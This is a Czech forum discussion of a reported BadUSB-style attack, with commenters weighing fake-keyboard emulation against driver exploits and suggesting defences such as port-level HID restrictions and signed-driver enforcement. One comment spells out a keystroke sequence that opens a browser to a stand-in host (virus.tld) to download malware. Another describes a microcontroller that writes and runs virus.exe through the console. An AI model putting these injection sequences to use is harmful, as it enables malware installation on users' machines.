Názory k článku Postřehy z bezpečnosti: nová metoda tichého zneužití USB
-
Jiří J. (neregistrovaný)
Vypadá to, že ta "nová metoda" je stará emulace klávesnice. Něco, co už tady bylo v podobě "podvržené" USB myši před asi rokem.
"Nohl explained that during his tests, he was able to gain remote access to a computer using a malicious code that, once the USB is connected, instructs the targeted system to download a malware. The code deceives the PC making it believe that the malicious instructions are originated by a keyboard or any other USB device."
Jak jinak na to? .. USB controller nemá DMA (narozdíl od firewire), takže pokud se skutečně jedná o "novou metodu", je to spíš pouhý exploit chipset driveru (ehci/xhci/..) - i kdyby mohl podvrhnout device ID a posílat URB jako jiné zařízení (klávesnice), tak to neznamená automatický rootkit.
-
ebik (neregistrovaný)
Kdysi byly konektory klavesnice oddelene. Kdybych nekomu dal tehdy prenosny disk a rekl, zapoj to jeste do konektoru od klavesnice, tak by pojal urcite podezreni. A take jednoducha obrana proti fake HID utoku by byla, kdyby si clovek mohl v systemu zvolit, na kterych USB portech se smi HID zarizeni pripojit.
Cetl jsem odkazovany clanek a nedozvedel jsem se z nej, zda je moje domenka o fake HID spravna, nebo zda se jedna o jiny typ utoku, postihujici pouze operacni systemy jednoho vyrobce.
-
ebik (neregistrovaný)
Aha, proto je tam ten druhy odkaz. Tam je jako priklad i fake sitova karta, nebo "fake" obycejny usb disk s boot virusem. Proste bezpecny system by mel uzivatele vyzvat k tomu zda se ma instalace zarizeni spustit, a dat moznost "administratorovi" zakazat nektere typy zarizeni. Jediny drobny problem je s primarni klavesnici/mysi, ale i tady lze zkombinovat hardwarovou ochranu toho ze proverena klavesnice je zapojena do spravneho portu, se softwarovym povolenim te klavesnice/mysi na tom konkretnim portu.
-
RDa (neregistrovaný)
A jaky je tedy vektor utoku? Pokud je to klavesnice a udela:
win+r
firefox
alt+d
http://virus.tld/download
enter
enter
entertak me neprijde ze by si toho antivirus nevsiml. Ale je docela mozne ze tam jeste pak klepne "nemazat, spustit", ale to by ta klicenka musela vedet o dialozich.. a rozhodne to nebude neviditelne.
-
Karel (neregistrovaný)
V rámci hraní si s mikrořadiči jsme dělali "virus" co po připojení do USB spustil konzoli, v ní vytvořil soubor v profilu uživatele (copy con virus.exe) a ten spustil. Antivirus soubor normálně zkontroloval a nic neohlásil. Tedy záleželo na tom, kde soubor byl, ze složky "Downloads" antivirus křičel, z "Desktop" na některé koncovky taky.
-
zaspali dobu. keylogger utok na windows s loaderem bez te jedne zaplaty, ktera znefunkcni loader primo pres podvrzene kylogovaci usb drivery je stary jak metuzalem. staci zapatrat v bugzille mozilly, kde lidi s windows hlasi problem s tim, ze se jim stranka pri drzeni pouze klavesy ctrl samovolne zmensuje. oprava je jednoducha. vynutit pouze drivery s validnim digitalnim podpisem v nastaveni. rebootnout a pridat a odebrat zarizeni, at se preinstaluje.
